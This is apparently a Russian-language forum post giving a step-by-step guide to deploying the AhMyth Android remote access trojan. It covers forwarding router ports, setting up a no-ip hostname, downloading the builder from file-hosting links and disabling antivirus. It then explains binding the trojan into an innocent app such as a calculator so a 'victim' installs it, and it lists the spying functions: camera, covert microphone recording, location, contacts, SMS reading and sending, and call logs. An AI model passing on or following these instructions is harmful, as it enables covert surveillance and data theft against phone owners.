AhMyth Android RAT 2017 - Вирус удалённого доступа на Android

(в конце видео)
--------------------------------------------
Шалом.
Значит видел такую тему, но все её просто сливали, не описывая никаких деталей. Решил взять ситуацию в свои руки, ведь мы не "все", а как никак "илита". Короче поехали.
Самым первым делом если вы захотите побаловаться такой плюшечкой то идите на https://java.com/ru/download/



Скачали? Молодцы, идем дальше. Следующий шаг это открытие портов. Важно знать, что здесь весомую роль будет играть антивирус. Например у меня на ноуте ЕСЕТ 7 и на нем мне пришлось добавлять порты в список доверенных, а также указывать приложение. А на компе стоит ЕСЕТ 9, там делать ничего не надо. Поэтому если в роутере вы все сделали правильно (я про открытие портов), но у вас нихрена не получается то смотрите свой антивирус.
Ну че, пошли в роутер. У каждого настройки будут по разному, но найти их вы сможете.



Вот так выглядит мой роутер. Для того, чтобы добавить открытый порт необходимо нажать кнопку "ДОБАВИТЬ" (правый нижний угол).



Имя - любое, хоть pisun ;
Интерфейс будет Internet
Протокол TCP/UDT
И везде, где написано "ПОРТЫ" ставьте тот порт, который вы хотите открыть. Я выбрал 2222



И ВНИМАНИЕ НЕ ЗАБУДЬТЕ УКАЗАТЬ ВАШ ЛОКАЛЬНЫЙ IP АДРЕС !
Там где написано "Внутренний IP" вы ставите то, что указано в "ipconfig"



далее



Видим, что локальный IP в моем случае это 192.168.1.2
Поэтому во "Внутренний IP" пишем эти данные.
В конце получаем:



ВАЖНО НЕ ЗАБЫТЬ НАЖАТЬ НА "Добавить" и после того как вы увидите, что ваш порт оказался в списке нажать "Сохранить и перезагрузить" модем.



Все, порты мы открыли. Двигаемся дальше.

Думали всё? Типа я щас дам ссылку и будем качать? Нее, еще не всё)
Идем сюда http://www.noip.com/ и регистрируемся



Сейчас вы видите мой личный кабинет. Видите кнопочку "DOWNLOAD" ? Вот нажмите на нее и установите клиент.
Когда установите он попросит вас авторизоваться. Данные такие же как и на сайте.
После авторизации нажимаем Tools - Manager Host



Открывается окно.



Нажимаете "ADD A HOST" (оранжевая кнопка)

Вписываете любой "HOSTNAME"и выберите лучше "zapto.org" (как я сделал на скрине)



Нажимаете на оранжевую кнопку "ADD HOST"

Теперь возвращаемся в программу, которую только что скачали. Если вы все сделали правильно то при нажатии на кнопку "Edit Hosts" вы увидите созданный вами хост (как на скрине).



Поставьте на нем галочку, и нажмите на SAVE.
На этом подготовка окончена.

А вот теперь уже качаем это "добро"
Download
linux64 --> http://www.file-upload.cc/ibtefy5c60bc
linux32 --> http://www.file-upload.cc/8b39n7t2s2kc
windows64 -->http://www.file-upload.cc/xlcrrqllyah4
windows32 --> http://www.file-upload.cc/et03q48t13h1

Теперь устанавливаем. При установки выключите нахер антивирус, если забыли то выключаем антивирус и переустанавливаем. А вот после установки не сильно радуйтесь, у меня 2/3 компов увидели лагающее окно. Как бы оно кликабельно, но оно все серое, интерфейса вообще нет. Что делать в таком случае?
На ярлыке - правой кнопкой - свойства и указываем режим совместимости, а также запуск от имени администратора. Совместимость с ВинVista мне помогла



Далее запускаем.



Отправляемся в раздел, где указано "APK Builder"



Там где указан "Source IP" необходимо указать ваш созданный хост, в моем случае pisun.zipto.org (у вас будет же свой, который вы указали на сайте и, на котором вы поставили галочку в той программе)

"Pource Port" - пишем наш открыты порт 2222

Теперь у вас есть несколько вариантов создания вашего RAТника
"Bind With Another Apk" - поставив галочку вы подтвердите создание вируса вместе с другим АПК. То есть вирус будет ВШИТ в другой АПК. для этого вам потребуется скачать (ЖЕЛАТЕЛЬНО) лёгкий apk (АПК или apk это так называют приложения на андройде кто не знает). Например у вас есть калькулятор, календарь месячных и тд. вот выбираете этот календарь и в него будет вшит вирус.



Либо вы можете не ставить галочку, а просто создать вирус без участия другого приложения. НО в таком случае он будет отображен иконкой андройда на рабочем столе смартфона. Его нельзя будет открыть и "жертва" подумает, что это хрень какая-то и его удалит. Либо узайте другие программы, которые смогут скрыть иконку этого приложения и сделать его невидимым.

ОТКЛЮЧАЕМ АНТИВИРУС !
и Теперь нажимаем на кнопку BUILD



Ваш вирус готов. Где он находится вы увидите в логах.



Теперь его главное установить на телефон и запустить (не забывайте, что если есть возможность лучше его скрыть с рабочего стола).



Теперь подключаемся. Для подключения необходимо ввести порт и нажать кнопку >_ LISTEN .
Что можно делать? А вот вам и функционал.



Делать снимки с камеры (как с фронталки так и с попки)



Файловый менеджер



Подслушивать диалоги, можно указать на сколько секунд включить микрофон и он будет записывать. После записи можно будет сразу прослушать.



Геоположение человека



Весь список контактов



ПРОСМАТРИВАТЬ И ОТПРАВЛЯТЬ СМСки





Ну и последнее - детализация звонков



Все, пользуйтесь на здоровье, но не во вред других. Не забывайте, что нарушать закон это плохо.
Скоро запишу видео и добавлю сюда. Если кто-то захочет перелить тему то указывайте источник и автора.
Это добро не палится антивирусами на мобилках, ну я проверял только двумя.



Кстати если не открываются порты то проверьте ваш антивирус, например ESET 7 блокирует попытки, если не знаете как то поставьте себе другой антивирус, у меня ESET 9.